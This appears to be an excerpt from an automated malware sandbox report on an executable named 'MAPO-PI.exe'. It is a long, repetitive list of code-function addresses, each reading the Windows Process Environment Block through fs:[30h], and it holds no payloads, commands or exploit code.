Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018958EC mov eax, dword ptr fs:[00000030h] 3_2_018958EC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h] 3_2_018940E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h] 3_2_018940E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h] 3_2_018940E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h] 3_2_018BB8E4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h] 3_2_018BB8E4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01964015 mov eax, dword ptr fs:[00000030h] 3_2_01964015
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01964015 mov eax, dword ptr fs:[00000030h] 3_2_01964015
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h] 3_2_01917016
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h] 3_2_01917016
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h] 3_2_01917016
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h] 3_2_018AB02A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h] 3_2_018AB02A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h] 3_2_018AB02A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h] 3_2_018AB02A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h] 3_2_018C002D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h] 3_2_018C002D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h] 3_2_018C002D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h] 3_2_018C002D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h] 3_2_018C002D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h] 3_2_018B0050
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h] 3_2_018B0050
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961074 mov eax, dword ptr fs:[00000030h] 3_2_01961074
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952073 mov eax, dword ptr fs:[00000030h] 3_2_01952073
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h] 3_2_018A1B8F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h] 3_2_018A1B8F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h] 3_2_0194D380
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h] 3_2_018C2397
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h] 3_2_018CB390
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195138A mov eax, dword ptr fs:[00000030h] 3_2_0195138A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h] 3_2_018C4BAD
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h] 3_2_018C4BAD
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h] 3_2_018C4BAD
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h] 3_2_01965BA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019153CA mov eax, dword ptr fs:[00000030h] 3_2_019153CA
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019153CA mov eax, dword ptr fs:[00000030h] 3_2_019153CA
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h] 3_2_018BDBE9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h] 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h] 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov eax, dword ptr fs:[00000030h] 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195131B mov eax, dword ptr fs:[00000030h] 3_2_0195131B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h] 3_2_0189DB40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h] 3_2_01968B58
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h] 3_2_0189F358
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h] 3_2_0189DB60
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h] 3_2_018C3B7A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h] 3_2_018C3B7A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h] 3_2_018CD294
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h] 3_2_018CD294
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h] 3_2_018952A5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h] 3_2_018952A5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h] 3_2_018952A5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h] 3_2_018952A5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h] 3_2_018952A5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h] 3_2_018AAAB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h] 3_2_018AAAB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h] 3_2_018CFAB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h] 3_2_018C2ACB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h] 3_2_018C2AE4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h] 3_2_018A8A0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h] 3_2_0195AA16
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h] 3_2_0195AA16
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h] 3_2_018B3A1C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h] 3_2_01895210
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h] 3_2_01895210
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h] 3_2_01895210
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h] 3_2_01895210
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h] 3_2_0189AA16
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h] 3_2_0189AA16
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h] 3_2_018D4A2C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h] 3_2_018D4A2C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h] 3_2_0195EA55
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01924257 mov eax, dword ptr fs:[00000030h] 3_2_01924257
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h] 3_2_01899240
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h] 3_2_01899240
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h] 3_2_01899240
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h] 3_2_01899240
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h] 3_2_0194B260
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h] 3_2_0194B260
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h] 3_2_01968A62
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D927A mov eax, dword ptr fs:[00000030h] 3_2_018D927A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h] 3_2_018CFD9B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h] 3_2_018CFD9B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h] 3_2_018C35A1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h] 3_2_018C1DB5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h] 3_2_018C1DB5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h] 3_2_018C1DB5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019605AC mov eax, dword ptr fs:[00000030h] 3_2_019605AC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019605AC mov eax, dword ptr fs:[00000030h] 3_2_019605AC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h] 3_2_01948DF1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h] 3_2_018AD5E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h] 3_2_018AD5E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h] 3_2_01968D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h] 3_2_0191A537
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h] 3_2_0195E539
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h] 3_2_018C4D3B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h] 3_2_018C4D3B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h] 3_2_018C4D3B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h] 3_2_0189AD30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h] 3_2_018D3D43
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01913540 mov eax, dword ptr fs:[00000030h] 3_2_01913540
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h] 3_2_01943D40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h] 3_2_018B7D50
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h] 3_2_018BC577
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h] 3_2_018BC577
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A849B mov eax, dword ptr fs:[00000030h] 3_2_018A849B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h] 3_2_01968CD6
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h] 3_2_01916CF0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h] 3_2_01916CF0
